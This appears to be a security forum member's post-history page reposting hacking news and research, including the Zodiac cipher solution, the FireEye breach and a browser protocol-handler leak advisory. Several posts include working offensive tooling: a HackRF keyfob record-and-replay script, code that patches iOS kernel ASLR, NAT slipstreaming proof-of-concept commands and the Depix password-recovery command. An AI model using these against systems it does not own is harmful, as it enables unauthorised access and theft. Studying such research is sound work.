
Nytro

Administrators
  • Posts: 18710
  • Joined
  • Last visited
  • Days Won: 700

Everything posted by Nytro

  1. Yes, there's both a movie and a book. I'm going to look for the book. Like any movie/book, not everything in it is completely real, but it's based on those facts.
  2. I thought of you. I figured it would get sorted quickly at a repair shop in the area. It turned out OK, final price 700 RON, less than I was expecting. It seems to be working fine.
  3. Nytro

    iPhone 7

    We could understand you no longer knowing the password, but not the email either? If it's yours, try Forgot password on every email address you use; one of them has to be it.
  4. X-MAS CTF is a Capture The Flag competition organized by HTsP. This year we have prepared challenges from a diverse range of categories such as cryptography, web exploitation, forensics, reverse engineering, binary exploitation, hardware, algorithmics and more! We made sure that each category has challenges for every skill level, so that there is always something for everyone to enjoy and work on. This competition uses a dynamic scoring system, meaning that the more solves a challenge has, the fewer points it is worth to each of the solving teams. This system is in place to keep each challenge's score in line with its real difficulty level. Sursa: https://xmas.htsp.ro/home
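     For readers unfamiliar with dynamic scoring, here is a minimal Python sketch of the kind of decay curve such systems typically use. This is only an illustration of the idea; the exact formula, parameter names and values used by X-MAS CTF are assumptions, not taken from the announcement.
     # Illustrative dynamic scoring: a challenge starts at max_points and
     # decays toward min_points as the number of solves grows.
     def dynamic_score(solves, max_points=500, min_points=50, decay=30):
         # Quadratic decay similar to what CTFd-style platforms use (assumption).
         value = ((min_points - max_points) / (decay ** 2)) * (solves ** 2) + max_points
         return int(max(min_points, min(max_points, value)))

     for s in (0, 5, 15, 30, 60):
         print(s, "solves ->", dynamic_score(s), "points")
     With these example parameters a fresh challenge is worth 500 points and drops toward 50 as more teams solve it, which is exactly the behaviour the announcement describes.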
  5. Yes, it was too late anyway, but at least they "broke" that message. Although it doesn't seem exactly sci-fi, the algorithm itself wasn't all that complicated; it was extremely hard to crack because there were billions of possibilities. But it's nice to see a practical, real-world cryptanalysis exercise.
  6. I think it's brilliant. I recommend it. Both the story and how it was cracked are really interesting. Crypto in real life.
  7. On December 3rd, 2020, an international three-person team of codebreakers made a breakthrough with the Zodiac Killer's unsolved 340-character cipher. By December 5th, the team finished cracking the cipher and sent the solution to the FBI. This is the full message from the Zodiac Killer that was hidden in the 340-character cipher for 51 years: I HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH The members of the team that cracked the code are: * Sam Blake (Australia) * Jarl Van Eycke (Belgium) * David Oranchak (USA) This video is my attempt to tell the story of this long overdue breakthrough. More details are reported in Michael Butterfield's article here: http://zodiackillerfacts.com/news-and... Credits: Music: Dave Miles: Movement (ZapSplat: https://www.zapsplat.com/author/dave-...) “Thanks” animation: https://www.youtube.com/watch?v=l1whg... melissariveradesign.com Jim Dunbar show archival footage: https://www.youtube.com/watch?v=oTJI4... Mentioned in the video: AZDecrypt code breaking software by Jarl Van Eycke: http://zodiackillersite.com/viewtopic... Peek-a-boo cryptanalysis software by Heiko Kalista: http://www.zodiackillersite.com/viewt... Zkdecrypto by Brax Cisco et. al.: https://code.google.com/archive/p/zkd... Mike Morford’s Zodiac site: http://zodiackillersite.com Michael Butterfield’s Zodiac site: http://zodiackillerfacts.com Tom Voigt’s Zodiac site: http://zodiackiller.com http://zodiackillerciphers.com We dedicate these efforts to the victims of the Zodiac Killer, their families and descendants. We hope that one day justice will prevail.
  8. I don't know what nonsense the guy above is posting. Look here at the effects the vaccine actually has: https://9gag.com/gag/a8GBWeQ (PS: just kidding, in case some people don't get it). The Bill Gates theory is a bad one... Can you imagine if it really had that microchip? It would clearly run Windows! You want to go shopping? BSOD, damn it! You want to go to sleep? You'd have to wait for the damn thing to finish its update! I don't even want to think about how slowly your body would run afterwards...
  9. The repair shop called me; it seems I busted it pretty thoroughly. 1. The keyboard has to be held in by plastic rivets, at least 80% of them. I had melted an old key with the soldering gun and stuffed it into a few spots, which is not how you do it. 2. That keyboard ribbon cable apparently had to be glued somehow to the part the keyboard sits on. I left it "loose" and it didn't even seat properly; it caused some kind of short circuit and fried the video controllers (no idea what those are), which is why I wasn't seeing anything on the screen. 3. It seems the touchpad doesn't work either; I'm not sure exactly why, I probably pulled too hard on its ribbon. At least I hadn't broken the Power button, so I feel like an expert. The good news: the shop seems to have found, through its partners, a palmrest with keyboard and touchpad for about 360 RON. What I had found online was over 600 RON, so I'm doing fine. And I'll probably have it working on Monday. I hope they also glue the case back together; 2-3 little screws "broke off" and the back panel wouldn't stay on at all. Conclusion: I'm not attempting something like this again, unless it's something extremely simple. Maybe not even then. At least I'm learning a thing or two about hardware...
  10. Indeed, DNS traffic can be "intercepted" by your ISP, but still... Anyway, for extra safety use DoH (DNS over HTTPS) and the problem is solved.
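     As a quick illustration of DoH, here is a minimal Python sketch that resolves a name through Cloudflare's public DNS-over-HTTPS endpoint using its JSON API. The resolver URL and record type are just example choices; any DoH provider works the same way.
     import json
     import urllib.request

     def doh_resolve(name, rtype="A", resolver="https://cloudflare-dns.com/dns-query"):
         # The JSON flavour of DoH: a normal HTTPS GET, so the ISP only sees
         # TLS traffic to the resolver, not the names being looked up.
         url = f"{resolver}?name={name}&type={rtype}"
         req = urllib.request.Request(url, headers={"accept": "application/dns-json"})
         with urllib.request.urlopen(req) as resp:
             answer = json.load(resp)
         return [rr["data"] for rr in answer.get("Answer", [])]

     print(doh_resolve("rstforums.com"))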
  11. DECEMBER 9, 2020 STEVE MOULD HACKS INTO HIS CAR WITH A HACKRF Over on YouTube popular science content creator Steve Mould has uploaded a video showing how he was able to open his own car using a HackRF software defined radio. In the video Steve first uses the Universal Radio Hacker software to perform a simple replay attack by using his HackRF (and also an RTL-SDR V3) to record the car's keyfob signal away from the car and replay it near the car. Steve goes on to note that most cars use rolling code security, so a simple replay attack like the above is impractical in most situations. Instead he notes how a more advanced technique called "rolljam" can be used, which we have posted about a few times in the past. Later in the video Steve interviews Samy Kamkar who was the security researcher who first popularized the rolljam technique at Defcon 2015. Sursa: https://www.rtl-sdr.com/steve-mould-hacks-into-his-car-with-a-hackrf/
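     To make the replay-attack part concrete, here is a minimal Python sketch that drives the stock hackrf_transfer utility to capture a keyfob burst and play it back. The frequency, sample rate and file name are assumptions for illustration, and, as the article notes, a plain replay only works against receivers that do not use rolling codes.
     import subprocess

     FREQ = "433920000"      # assumed keyfob frequency (433.92 MHz ISM band)
     RATE = "2000000"        # 2 Msps sample rate
     CAPTURE = "keyfob.iq"   # raw IQ capture file

     def record(seconds=5):
         # Record raw IQ samples from the HackRF to a file; `timeout` just stops
         # the capture after a few seconds for convenience.
         subprocess.run(["timeout", str(seconds), "hackrf_transfer",
                         "-r", CAPTURE, "-f", FREQ, "-s", RATE], check=False)

     def replay():
         # Transmit the recorded samples again (simple replay, defeated by rolling codes).
         subprocess.run(["hackrf_transfer", "-t", CAPTURE, "-f", FREQ, "-s", RATE],
                        check=True)

     record()
     replay()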
  12. Four sentenced to prison for planting malware on 20 million Gionee smartphones. Chinese quartet conspired to plant a malicious SDK inside an app that came preinstalled on Gionee devices. By Catalin Cimpanu for Zero Day | December 9, 2020 -- 02:40 GMT | Topic: Security. Four Chinese nationals were sentenced last week to prison terms for participating in a scheme that planted malware on devices sold by Chinese smartphone maker Gionee. The scheme involved Xu Li, the legal representative of Shenzhen Zhipu Technology, a Gionee subsidiary tasked with selling the company's phones, and the trio of Zhu Ying, Jia Zhengqiang, and Pan Qi, the deputy general manager and software engineers of software firm Beijing Baice Technology. According to court documents published last week by Chinese authorities, the two companies entered into a hidden agreement in late 2018 to create a powerful software development kit (SDK) that would allow the two parties to take control of Gionee smartphones after they were sold to customers. The SDK was inserted on Gionee smartphones by Shenzhen Zhipu Technology in the form of an update to Story Lock Screen, a screen-locker app that came preinstalled on Gionee devices. But Chinese officials said the SDK acted like a trojan horse and converted infected devices into bots, allowing the two companies to control customers' phones. The two companies used the SDK to deliver ads through a so-called "live pulling" function. THE TWO COMPANIES MADE $4.26 MILLION FROM ADS. Court documents say that between December 2018 and October 2019, more than 20 million Gionee devices across the world received more than 2.88 billion "pull functions" (ads), generating more than 27.85 million Chinese yuan ($4.26 million) in profit for the two companies. The entire scheme appears to have come crashing down after a suspected bug started blocking access to some Gionee phone screens, which led the parent company's support staff to start an investigation, which in turn led to an official complaint to Chinese authorities. The four suspects were arrested in November 2019. According to reports from local media, the four didn't dispute the investigators' findings and pleaded guilty in exchange for reduced sentences. The quartet received prison sentences ranging from 3 to 3.5 years and fines of 200,000 Chinese yuan ($30,500) each. Shenzhen Zhipu Technology also received a separate fine of 400,000 Chinese yuan ($61,000). A Gionee spokesperson did not return emails or phone calls seeking comment on the countries where the malware-laced smartphones were sold. Sursa: https://www.zdnet.com/article/four-sentenced-to-prison-for-planting-malware-on-20-million-gionee-smartphones/
  13. FireEye reveals that it was hacked by a nation state APT group. By Sergiu Gatlan, December 8, 2020 04:58 PM. Leading cybersecurity company FireEye disclosed today that it was hacked by a threat actor showing all the signs of a state-sponsored hacking group. The attackers were able to steal Red Team assessment tools that FireEye uses to test customers' security, designed to mimic tools used by many cyber threat actors. Attacker showed all the signs of a state-backed threat actor. "Recently, we were attacked by a highly sophisticated threat actor, one whose discipline, operational security, and techniques lead us to believe it was a state-sponsored attack," Chief Executive Officer and Board Director Kevin Mandia said in a filing with the Securities and Exchange Commission (SEC). "Based on my 25 years in cyber security and responding to incidents, I’ve concluded we are witnessing an attack by a nation with top-tier offensive capabilities." The threat actor who breached FireEye's defenses specifically targeted FireEye's assets and used tactics designed to counter both forensic examination and security tools that detect malicious activity. The cybersecurity firm is still investigating the cyberattack with the collaboration of the Federal Bureau of Investigation and security partners like Microsoft. So far, initial analysis of the attack supports FireEye's conclusion that the company was the victim of a "highly sophisticated state-sponsored attacker utilizing novel techniques." State-sponsored hackers stole FireEye Red Team tools. "During our investigation to date, we have found that the attacker targeted and accessed certain Red Team assessment tools that we use to test our customers’ security," Mandia added. "None of the tools contain zero-day exploits. Consistent with our goal to protect the community, we are proactively releasing methods and means to detect the use of our stolen Red Team tools." The stolen tools "range from simple scripts used for automating reconnaissance to entire frameworks that are similar to publicly available technologies such as CobaltStrike and Metasploit," FireEye said in a blog post on its Threat Research blog. However, many of them were already available to the broader security community or were distributed as part of FireEye's CommandoVM open-source virtual machine. The Red Team tools stolen in the attack haven't yet been used in the wild based on information collected since the incident, and FireEye has taken measures to protect against potential attacks that will use them in the future:
  • We have prepared countermeasures that can detect or block the use of our stolen Red Team tools.
  • We have implemented countermeasures into our security products.
  • We are sharing these countermeasures with our colleagues in the security community so that they can update their security tools.
  • We are making the countermeasures publicly available on our GitHub.
  • We will continue to share and refine any additional mitigations for the Red Team tools as they become available, both publicly and directly with our security partners.
This GitHub repository contains a list of Snort and Yara rules that can be used by organizations and security professionals to detect FireEye's stolen Red Team tools when used in attacks. Government customers' information also targeted. During the attack, the threat actor also attempted to collect information on government customers and was able to gain access to some FireEye internal systems.
"While the attacker was able to access some of our internal systems, at this point in our investigation, we have seen no evidence that the attacker exfiltrated data from our primary systems that store customer information from our incident response or consulting engagements, or the metadata collected by our products in our dynamic threat intelligence systems," Mandia explained on FireEye's corporate blog. FireEye is a cybersecurity firm founded in 2004 with headquarters in Milpitas, California. It has over 8,500+ customers in 103 countries and more than 3,200+ employees worldwide. Sursa: https://www.bleepingcomputer.com/news/security/fireeye-reveals-that-it-was-hacked-by-a-nation-state-apt-group/
  14. Hi, I think you're more likely to find resources on YouTube: https://www.youtube.com/results?search_query=game+development
  15. Depix: Depix is a tool for recovering passwords from pixelized screenshots. This implementation works on pixelized images that were created with a linear box filter. In this article I cover background information on pixelization and similar research.
  Example:
  python depix.py -p images/testimages/testimage3_pixels.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o output.png
  Usage:
  • Cut out the pixelated blocks from the screenshot as a single rectangle.
  • Paste a De Bruijn sequence with the expected characters into an editor with the same font settings (text size, font, color, hsl).
  • Take a screenshot of the sequence. If possible, use the same screenshot tool that was used to create the pixelized image.
  • Run: python depix.py -p [pixelated rectangle image] -s [search sequence image] -o output.png
  Algorithm: The algorithm uses the fact that the linear box filter processes every block separately. For every block in the pixelated image it pixelizes all blocks in the search image and checks for direct matches. For most pixelized images Depix manages to find single-match results and assumes these are correct. The matches of surrounding multi-match blocks are then compared to be geometrically at the same distance as in the pixelized image; these matches are also treated as correct. This process is repeated a couple of times. Once the correct blocks have no more geometrical matches, it outputs all correct blocks directly. For multi-match blocks, it outputs the average of all matches. Sursa: https://github.com/beurtschipper/Depix
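     To illustrate what a "linear box filter" pixelization actually does (and therefore what Depix is inverting), here is a minimal Python/numpy sketch that replaces each block of a grayscale image with the average of its pixels. The block size and image handling are simplified assumptions, not Depix's actual code.
     import numpy as np

     def box_filter_pixelize(img, block=8):
         # Each block becomes a single flat colour: the mean of its pixels.
         # Depix searches a reference image for blocks whose pixelized value matches
         # each block in the target, which is why the filter being linear matters.
         h, w = img.shape
         out = img.astype(float).copy()
         for y in range(0, h, block):
             for x in range(0, w, block):
                 out[y:y+block, x:x+block] = img[y:y+block, x:x+block].mean()
         return out.astype(np.uint8)

     # Toy example: a random 32x32 "screenshot".
     demo = (np.random.rand(32, 32) * 255).astype(np.uint8)
     print(box_filter_pixelize(demo, block=8))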
  16. ASLR & the iOS Kernel — How virtual address spaces are randomised Billy Ellis 11 hours ago·11 min read In this blog post I want to take a look at ASLR and how the iOS kernel implements it for user-space processes. We’ll cover: what ASLR actually is and how it aims to mitigate exploitation how the iOS kernel implements ASLR for apps & processes that are executed on the device a short experiment you can try that involves patching the iOS kernel to disable ASLR across all user-space processes! What is ASLR? ASLR stands for ‘Address Space Layout Randomisation’ — it is a security mitigation found in pretty much all systems today. It aims to make it difficult for an exploit developer to locate specific parts of a program in memory by randomising the memory address space of the program each time it is launched. This results in the exploit developer not being able to predict the memory location of variables and functions within their target, adding a layer of difficulty to common exploit techniques like Return Oriented Programming. The way ASLR implements this randomisation is by sliding the entire process address space by a given amount. This given amount is known as the ‘slide’ or the ‘offset’. The following diagram aims to illustrate how a process without ASLR compares to a process with ASLR. Looking at the diagram, Process A is loaded into memory at a static virtual address — 0x10000. Process A will always be loaded into memory starting at the same base address due to the lack of ASLR. This means that an attacker can easily predict where specific variables and functions will be in memory. Process B, on the other hand, is loaded into memory at starting at base address 0x14c00. This base address is dynamically calculated — every time Process B is launched, a slide value is generated at random and added to the static base address. In the diagram the random slide value used is 0x4c00. This value is added to the static base address — 0x10000 — which results in a new, randomised, base address. 0x10000 + 0x4c00 = 0x14c00 Every time Process B is launched, a new slide value will be chosen at random and therefore the base address (and the address of everything else in the binary) will be different each time. Unlike with Process A, an attacker cannot easily determine where in memory specific variables and functions will be located in Process B. This is the goal of ASLR. Note that the entire address space is shifted by the slide amount, resulting in variables and functions still being located at the same relative position to each other. This means that if the memory location of a single variable or function can be leaked, the address of everything else in the process can easily be calculated, thus defeating ASLR altogether. Exploit developers often rely on an information leak vulnerability — a bug that leaks a pointer from the target process — in order to defeat ASLR using this method. ASLR on iOS On iOS (and on most other operating systems) ASLR is implemented for both the kernel and the user-land processes. The kernel’s ASLR slide is randomised on every reboot. The slide value is generated by iBoot, the second stage boot-loader, during the boot process. For user-land processes, the ASLR slide is randomised every time a process is executed. Every user-space process has a unique slide. The slide value is generated by the kernel during the binary loading routine. In this blog post we will be focusing only on the user-land ASLR in iOS, and more specifically how the kernel implements it. 
The iOS kernel is based on XNU, and XNU is open source. This makes it fairly easy to look into how parts of the iOS kernel work, as we can refer directly to the source code. The iOS kernel isn't a direct result of compiling XNU, however. Apple adds new, iOS-specific code to XNU and these parts are kept closed source, although referring to the XNU source code is generally still very useful for getting a high-level understanding of parts of the iOS kernel code base.
The function load_machfile() in bsd/kern/mach_loader.c in XNU is responsible for parsing a given Mach-O file (the executable format used on iOS), setting up a new task, loading it into memory etc. Every time you open an app or run a binary on your iPhone, this function is called in the kernel. It's in this function that the ASLR slide for the new process is generated. In load_machfile(), after the initial setup of creating a new pmap and vm_map for the to-be process, we reach the code responsible for generating the ASLR slide. There are actually two ASLR slide values being generated here — one for the new process and one for dyld. Both are generated in the same way. Firstly, a random 32-bit value is generated by the call to random(). Secondly, this random value is 'trimmed' down so that it does not exceed the maximum slide value: on 32-bit it gets trimmed down to just one byte, on 64-bit it's two. Thirdly, the trimmed value is shifted left by an amount depending on the host's page size. The resulting value is the ASLR slide. For example:
  1. random() returns 0x3910fb29
  2. Value 0x3910fb29 is trimmed down to 0x29 (assuming a 32-bit OS)
  3. Byte 0x29 is shifted left by the page shift amount (12 here)
The resulting 0x29000 is the ASLR slide value that will be used for this new process (a short recap of this arithmetic appears at the end of this post). Shortly after the slide values are generated, load_machfile() calls into another function — parse_machfile(). This function is much larger and proceeds to load each Mach-O segment into the virtual memory space, perform code-signing-related tasks and ultimately launch the new process.
To see ASLR in effect, compile the following program on your iOS device:
  #include <stdio.h>
  #include <string.h>

  char *str = "HELLO ASLR";

  int main() {
      printf("ptr %p\n", str);
      return 0;
  }
This code prints a pointer (using the %p format specifier) to a static char array stored in the binary. Compile this code using the -fpie flag. This flag makes the code 'position independent' — essentially meaning it supports address space randomisation. This should actually be enabled automatically and, in fact, 64-bit iOS enforces it. If you've ever dealt with ASLR on 64-bit iOS, you may have noticed that compiling a binary with -fno-pie (to disable position independent code) has no effect — all processes are launched with ASLR regardless. If you run the above program a few times, you'll notice that the pointer to the static char array changes on each new execution. This is due to a new slide value being generated by the kernel each time. You may also notice that the three right-most hexadecimal digits remain the same — this makes sense, as we know from the kernel code that the format of the slide value will always be 0xXX000.
Patching the iOS kernel: A nice experiment you can try given the knowledge above is to actually patch the iOS kernel so that ASLR is disabled system wide. This is fairly straightforward to do — only a single instruction needs to be changed in the kernel in order for the ASLR slide to always be set to 0x0.
With a patch like this applied, all apps and processes executed (even those compiled with -fpie) will be mapped into memory at their static binary mapping. This can even be useful for other debugging/reversing tasks on iOS — having ASLR disabled at the kernel level can save you the time of recompiling programs with the -fno-pie flag, or of modifying AppStore apps in order to run them without ASLR. Unfortunately, due to KPP/KTRR on 64-bit iOS preventing us from writing to the __TEXT segment (the code section) of the kernel, we'll be limited to using a 32-bit jailbroken device for this exercise. You could apply the same patch in a static 64-bit kernel cache and boot the custom kernel on a device using an exploit like checkm8, but in this blog I'll stick to patching it dynamically on 32-bit iOS 9.0 on my iPhone 5C. Yeah, I guess 32-bit iOS is a bit redundant these days, but oh well. It's still a cool little experiment to try out.
The first step is to locate the load_machfile() function in the iOS kernel for your chosen device. Unfortunately the symbol for this function isn't available in the RELEASE kernels, so I had to locate it by searching for specific instruction patterns and using cross-references from other functions that do have symbols. Locating the specific code is beyond the scope of this post, but if you'd like to see a similar reverse engineering task where I go into detail about locating a specific part of kernel code, check out my previous blog — https://medium.com/@bellis1000/exploring-the-ios-screen-frame-buffer-a-kernel-reversing-experiment-6cbf9847365
Here's a snippet of the assembly code (taken from Ghidra) responsible for generating the ASLR slide. This is from the same part of the load_machfile() function that we looked at previously. The same three steps used to generate the slide are handled here, although for the initial random value generation, read_random() is being called instead of random(). There's quite a bit of flexibility in how we go about applying a patch to this — we just need to set the slide value to 0x0, every time. That's the aim; it doesn't really matter how we do it. You could:
  • NOP-out this whole section of code so there's no random generation at all
  • patch read_random() to always return 0x0, so the random number isn't actually random
  • overwrite the random slide value with 0x0 right after it is generated
The method I'm choosing is to patch the instruction bic r0, r1, 0x80000000. This instruction clears the top bit: it ANDs R1 with the bitwise complement of 0x80000000 and stores the result in R0. This is the last time the slide value (left in R0) is modified before it is passed to vm_map_page_shift(). If we can set the value to 0x0 just before the call to vm_map_page_shift() we will effectively disable ASLR: if the value is 0x0, shifting it by any amount, left or right, will still result in 0x0. The ARM instruction bic r0, r1, 0x80000000 is represented by four bytes — 21 f0 00 40. This part of the kernel is actually in Thumb mode (making use of a combination of 16-bit and 32-bit instructions), so we must be careful to replace the instruction with the same number of bytes to avoid messing up the alignment. The instruction I want to replace it with is movs r0, 0x0 — this will reset the value of R0 to 0x0, thus overwriting the random bytes used for the slide. However, this instruction is represented by only two bytes — 00 20 — not four. This isn't really a problem though.
All we need to do is replace the bic r0, r1, 0x80000000 instruction with two movs r0, 0x0 instructions so that we make up the same number of bytes. So essentially:
  bic r0, r1, 0x80000000
becomes:
  movs r0, 0x0
  movs r0, 0x0
The first time movs r0, 0x0 is executed, R0 will be set to zero. The second time it is executed nothing happens: it does the exact same thing again, leaving no visible change in the register state, so it essentially acts as a NOP (no-operation) instruction. I wrote a program that applies this patch to the kernel using vm_write() from the Mach API. I have the instructions hard-coded — both the bic r0, r1, 0x80000000 and the two movs r0, 0x0 joined together:
  #define DISABLE_BYTES 0x20002000 // movs r0, 0x0 x 2
  #define ENABLE_BYTES 0x4000f021  // bic r0, r1, 0x80000000
This allows me to easily disable and re-enable ASLR. All I have to do is patch the instruction with DISABLE_BYTES to disable ASLR, and un-patch the instruction by restoring the original bytes (using ENABLE_BYTES) to enable it again. I also have the address of the target instruction:
  #define INSTR_TO_PATCH_ADDR 0x802a3cc4
This address is specific to the iOS 9.0 kernel for iPhone5,4. If you want to try this yourself, you'll need the address of this same instruction for whichever kernel and device you're using. The code then simply reads from the instruction address to determine whether ASLR is currently enabled or disabled, and then applies the patch by writing the opposite set of bytes to toggle it. Below is the code for this program:
  uint32_t slide = get_kernel_slide();
  printf("[+] KASLR slide is %08x\n", slide);

  uint32_t current_bytes = do_kernel_read(INSTR_TO_PATCH_ADDR + slide);
  printf("[+] Current bytes %08x\n", current_bytes);

  if (current_bytes == ENABLE_BYTES) {
      do_kernel_write(INSTR_TO_PATCH_ADDR + slide, DISABLE_BYTES);
      printf("[+] Patched ASLR random instruction. ASLR disabled.\n");
  } else {
      do_kernel_write(INSTR_TO_PATCH_ADDR + slide, ENABLE_BYTES);
      printf("[+] Patched ASLR random instruction. ASLR enabled again.\n");
  }
Note: the functions get_kernel_slide(), do_kernel_read() & do_kernel_write() are all wrapper functions for Mach API calls that I have written. The code for these will be available on Github. Now to see this code in action! We first run the test program a few times to verify that ASLR is enabled: the addresses are randomised each time. Then we run the pwn_aslr program to patch the kernel code. The bic r0, r1, 0x80000000 instruction has been patched and ASLR has been disabled. Now we re-run the test program to verify. The addresses are static! The kernel patch worked and ASLR is no longer in effect. Here's a quick demo video showing the above in real time: https://youtu.be/D_pnGfTMYUI. The code for this tool is available on my Github if you want to explore it yourself. As I mentioned, you'll need to find the address of the kernel instruction you want to patch for the specific device + kernel combination you're using, unless you're using iOS 9.0 on iPhone5,4. You could also probably implement something similar on 64-bit if you use Luca Todesco's KPP bypass or Brandon Azad's A11 KTRR bypass. Link to the code — https://github.com/Billy-Ellis/aslr-kernel-patch Feedback always welcome. Thanks! — Billy Ellis @bellis1000 Sursa: https://bellis1000.medium.com/aslr-the-ios-kernel-how-virtual-address-spaces-are-randomised-d76d14dc7ebb
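     As a quick recap of the slide-generation steps described earlier (random value, trim, shift by the page shift), here is a minimal Python sketch; it only illustrates the arithmetic and is not the actual XNU code.
     PAGE_SHIFT = 12   # 4 KiB pages, consistent with the 0xXX000 slide format seen above

     def user_aslr_slide(rand32, is_64bit=False):
         mask = 0xFFFF if is_64bit else 0xFF   # trim to two bytes on 64-bit, one byte on 32-bit
         return (rand32 & mask) << PAGE_SHIFT

     print(hex(user_aslr_slide(0x3910fb29)))   # 0x29000, matching the example in the post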
  17. This talk will reveal the iOS 13 exploits I showcased earlier on Twitter (@08Tc3wBB) – an exploit chain for iOS 13.7 that relies upon a different kernel vulnerability since the 13.6 update patched the old one. I’ll be talking about the root cause and techniques used during the exploit development to bypass the mitigations that are unique to iOS to ultimately get the privilege of reading and writing kernel memory. === 08Tc3wBB is a Bug Bounty Hunter and a Security Researcher.
  18. Slipstream: This is a proof of concept for the NAT slipstreaming vulnerability discussed here.
  Building: slipstream has no external dependencies and does not depend on CGO. You can build the executable and/or cross compile for other platforms using the go compiler with the following command: go build
  Usage: slipstream will produce a single executable that is both the server and client. You must first set up the server on a remote host that is outside of your NAT: ./slipstream -l -lp 5060
  You can then use slipstream to connect to the host outside of your NAT and let it attempt to connect back to you: ./slipstream -ip <local ip> -host <remote host> -rp 5060 -lp <local port>
  Why another implementation? After spending many hours attempting to get the original code working with no success, I was left not knowing whether my router was simply not vulnerable, I had misconfigured the code, the code was broken, or there were other implementation details stopping it from working. Eventually I was shown another implementation of the attack that skipped the web-based delivery and focused just on exploitation of the ALGs. This code is heavily based on that implementation, though it provides an end-to-end client and server to make testing simpler and avoids using an HTTP client to send the request due to issues discovered.
  What about web-based delivery? At the time of writing, the major browser vendors (Chromium and Firefox) have since provided mitigations against this by blocking outbound connections to port 5060. It's theoretically possible that this could be bypassed by switching to a different port or attempting to use a different ALG altogether. I'm assuming SIP was chosen due to its similarity to HTTP and widespread use. In testing some of the higher-end enterprise gear we discovered that due to slight differences (the / used in the HTTP path, the HTTP version rather than SIP/2.0, and differing headers) some networking equipment fails to parse the SIP requests generated by an HTTP client and simply drops them at the router. Given that it's been blocked by browsers and delivery is unreliable via an HTTP client, no attempt was made to port the newer webscan technique for local IP discovery for web-based delivery or to identify a browser bypass.
  License: MIT
  Sursa: https://github.com/jrozner/slipstream
  19. Leaking Browser URL/Protocol Handlers By Rotem Kerner | December 03, 2020 FortiGuard Labs Threat Research Report Affected platforms: Windows, Linux Impacted parties: Chrome, Firefox and Edge Impact: Leaking sensitive data Severity level: Medium Assigned CVEs: CVE-2020-15680 An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target. In this post we will discuss what are protocol handlers and disclose two information disclosure vulnerabilities affecting three major browsers (namely - Firefox, Edge and Chrome). Exploiting these vulnerabilities will enable a remote attacker to identify the presence of a vast amount of applications that may be installed on a targeted system. Overview - What Are Protocol Handlers? Generally speaking when talking about Protocol Handlers we are referring to a mechanism which allows applications to register their own URI scheme. This enables the execution of processes through the use of URI formatted strings. The Windows OS manages custom URL handlers under the following key- HKEY_CURRENT_USER\SOFTWARE\Classes\* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\* HKEY_CLASSES_ROOT\* When a URL Handler is invoked the OS is searching within those locations for keys containing values with the name “URL Protocol”. For instance, we can use regedit to inspect the path at HKEY_CLASSES_ROOT\msteams and see that it contains the special Value of “URL Protocol”. Figure 1 Looking further into HKEY_CLASSES_ROOT\msteams\shell\open\command\ we can see the actual command that gets invoked - Figure 2 Figure 3 In this example the browser will launch Teams.exe when a url that starts with “msteams” is clicked. Web browsers will enable their users to click on links with non-http schemes which will result in prompting the user with a message box asking them if they want to let another application handle this URL. Figure 4 Though it requires user interaction and thus poses a limited risk, it expands the attack surface beyond the browser borders. An attacker could craft a special web page which triggers another potentially vulnerable application. In some cases, such attacks may bypass protection measures such as Smart Screen and other security products. While exploring the potential of attacking the browsers through the different protocol handlers I got curious as to whether web browsers somehow disclose what protocols handlers exist on a targeted system. The short answer is yes. Leaking Protocol Handlers In this section we disclose how both Chrome, Edge and Firefox were circumvented in order to disclose which protocol handlers exist on a targeted system. It's worth mentioning that these findings are the result of manually playing with HTML/CSS components with the emphasis on finding a difference in behavior when referring (using some elements) to existing and non-existing URL handlers. The environment I’ve been testing on is Windows 10 but it is fair to assume that the same vulnerabilities exist on other platforms (such as Linux and Mac). Leaking Firefox protocol handlers (CVE-2020-15680) This vulnerability has been tested on Firefox 78.0.1 (64-bit) under Windows 10. 
To leak the protocol handlers in Firefox we leverage differences in the way firefox renders images sourced from existing and non-existing protocol handlers. For example, if we will try to load a web page containing the following element - And observe the elements styling using developer tools we would see that the default styling for broken images generate element with size of 24x24 as can be seen in Figure-5. Figure 5 Unlike the example above, if we try and create an image element and set source to some non-existent handler like the following. This will result with an element with different sizing of 0x0 as can be seen in Figure-6. Figure 6 This difference can be measured using a simple JS script Basing on this a malicious actor may perform a brute-force attack to disclose the different protocol handlers on a targeted system. The following example code will print whether a handlers exists or not on a targeted system. Leaking Chrome and Edge protocol handlers This vulnerability has been tested on Chrome 83.0.4103.116 under Windows 10. The exploitability of this vulnerability may be less stealthy but still yields equivalent results as the Firefox vulnerability. The mechanism here was different than the one in Firefox, here we leverage the fact that the window lose focus whenever the user is challenged with the message box as can be seen in figure-7. Figure 7 So, in order to detect if a given handler exists on the victim we take the following steps. First, we dynamically generate a link that is made of the scheme we would like to detect like such - Then we trigger the link and detect whether the document has focus: That will work for a one time check however if we would like to brute force an entire list of handlers we would have to get rid of the message box every time it pops up or else the document.hasFocus() will always return true. Figure 8 The technique we came up with was to redirect the user to an entirely different domain/ip which will eliminate any previously opened message box. Figure-8 draws the general idea of how the flow should be carried out in order to work. Protocol Handler Test page performs the actual test and saves the results to the back-end. In case the handler exists, it will redirect to “Redirect-Back Page” which exists on domain2.com. The redirection will get rid of the message box. Finally, back to the Protocol Handler Test Page for the next handler test. Vulnerabilities Impact Such information disclosure vulnerability could be exploited in several different ways. Here are some examples: Identifying communication channels: By listing the handlers an attacker can get a hint to what platforms he may use for reaching the targeted user. For instance, detecting social applications such as Slack, Skype, WhatsApp or Telegram may be used for communicating with the target. General reconnaissance: A wide range of applications nowadays uses custom URL handlers and can be detected using this vulnerability. Some examples: music players, IDE, office applications, crypto-mining, browsers, mail applications, antivirus, video conferencing, virtualizations, database clients, 